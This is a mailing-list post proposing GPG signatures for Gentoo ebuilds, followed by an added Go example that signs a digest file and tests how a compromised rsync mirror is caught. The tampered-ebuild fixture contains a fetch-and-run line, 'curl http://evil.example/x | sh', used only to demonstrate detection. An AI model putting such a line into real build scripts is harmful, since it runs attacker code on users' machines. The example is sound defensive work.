What do you think about signing the ebuilds and digests with GPG?
That would make it harder for blackhats to introduce a worm or something
similar (if they have got access to an rsync mirror).
My idea is to automatically sign the released ebuilds (before mirroring
them) with a key of gentoo.org.
Then emerge could check the signature and discard wrong ebuilds or just
throw a warning (preferably customizable via make.conf).
Just my 2 cents. ;)
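The flow proposed above, as an added example that is not part of the original mail and not Portage code: a release-side step signs the digest file, and an emerge-side step checks the signature against a trusted key and then the digests against the files, with a "strict"/"warn" switch standing in for the make.conf setting. Ed25519 from Go's standard library stands in for GPG, the digest line format, the policy names and the mirror contents are all made up here, and the scenarios exercise what a blackhat with write access to an rsync mirror can do.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// Policy stands in for a hypothetical make.conf knob (assumed name, not a real Portage variable).
type Policy string

const (
	Strict Policy = "strict" // bad or missing signature: refuse the ebuild
	Warn   Policy = "warn"   // bad or missing signature: warn, then continue
)

type Tree map[string]string // what an rsync mirror serves: path -> content (constructed data)

// BuildDigest writes one "SHA256 <hex> <path> <size>" line per path (format invented here).
func BuildDigest(t Tree, paths []string) string {
	var b strings.Builder
	for _, p := range paths {
		sum := sha256.Sum256([]byte(t[p]))
		fmt.Fprintf(&b, "SHA256 %s %s %d\n", hex.EncodeToString(sum[:]), p, len(t[p]))
	}
	return b.String()
}

// Sign is the release-side step: a detached signature over the digest file with the gentoo.org key.
func Sign(releaseKey ed25519.PrivateKey, digest string) []byte {
	return ed25519.Sign(releaseKey, []byte(digest))
}

// Verify is the emerge-side step: signature on the digest file against the trusted key
// (subject to policy), then every listed file against its recorded hash and size.
func Verify(trusted ed25519.PublicKey, t Tree, digest string, sig []byte, pol Policy) (bool, []string, error) {
	var warnings []string
	if !ed25519.Verify(trusted, []byte(digest), sig) {
		msg := "digest file is not signed by the trusted gentoo.org key"
		if pol == Strict {
			return false, nil, errors.New(msg)
		}
		warnings = append(warnings, msg) // Warn policy: report, but keep going
	}
	for _, line := range strings.Split(strings.TrimSpace(digest), "\n") {
		f := strings.Fields(line)
		if len(f) != 4 || f[0] != "SHA256" {
			return false, warnings, fmt.Errorf("malformed digest line %q", line)
		}
		size, err := strconv.Atoi(f[3])
		content, present := t[f[2]]
		sum := sha256.Sum256([]byte(content))
		if err != nil || !present || len(content) != size || hex.EncodeToString(sum[:]) != f[1] {
			return false, warnings, fmt.Errorf("digest mismatch for %s", f[2])
		}
	}
	return true, warnings, nil
}

type Outcome struct {
	Accepted bool
	Warnings int
	Err      error
}

// Scenarios runs the honest case and three ways a compromised mirror can be abused.
func Scenarios() map[string]Outcome {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)   // gentoo.org release key
	_, attacker, _ := ed25519.GenerateKey(rand.Reader) // key of whoever owns the mirror
	paths := []string{"app-misc/foo/foo-1.0.ebuild"}
	honest := Tree{paths[0]: "DESCRIPTION=\"foo\"\nsrc_install() { dobin foo; }\n"}
	digest := BuildDigest(honest, paths)
	sig := Sign(priv, digest)
	// The attacker swaps the ebuild; in the "forged" cases they also rebuild and re-sign the digest file.
	tampered := Tree{paths[0]: honest[paths[0]] + "curl http://evil.example/x | sh\n"}
	forgedDigest := BuildDigest(tampered, paths)
	forgedSig := Sign(attacker, forgedDigest)
	run := func(t Tree, d string, s []byte, p Policy) Outcome {
		ok, w, err := Verify(pub, t, d, s, p)
		return Outcome{ok, len(w), err}
	}
	return map[string]Outcome{
		"honest":             run(honest, digest, sig, Strict),
		"tampered-ebuild":    run(tampered, digest, sig, Strict),
		"forged-digest":      run(tampered, forgedDigest, forgedSig, Strict),
		"forged-digest-warn": run(tampered, forgedDigest, forgedSig, Warn),
	}
}

func main() {
	for name, o := range Scenarios() {
		fmt.Printf("%-18s accepted=%v warnings=%d err=%v\n", name, o.Accepted, o.Warnings, o.Err)
	}
}
```

Two things the scenarios make visible. A swapped ebuild with the signed digest file left alone fails on the digest mismatch, and a digest file re-signed with the mirror owner's key fails on the signature, so signing the digests protects the ebuilds only as long as the check is fatal: under the "warn" setting the forged tree is accepted with nothing but a warning, which is the price of making the behaviour configurable. The other precondition is that the trusted public key reaches the client over some path other than the rsync mirror itself, otherwise the attacker simply ships their own key along with the forged digests.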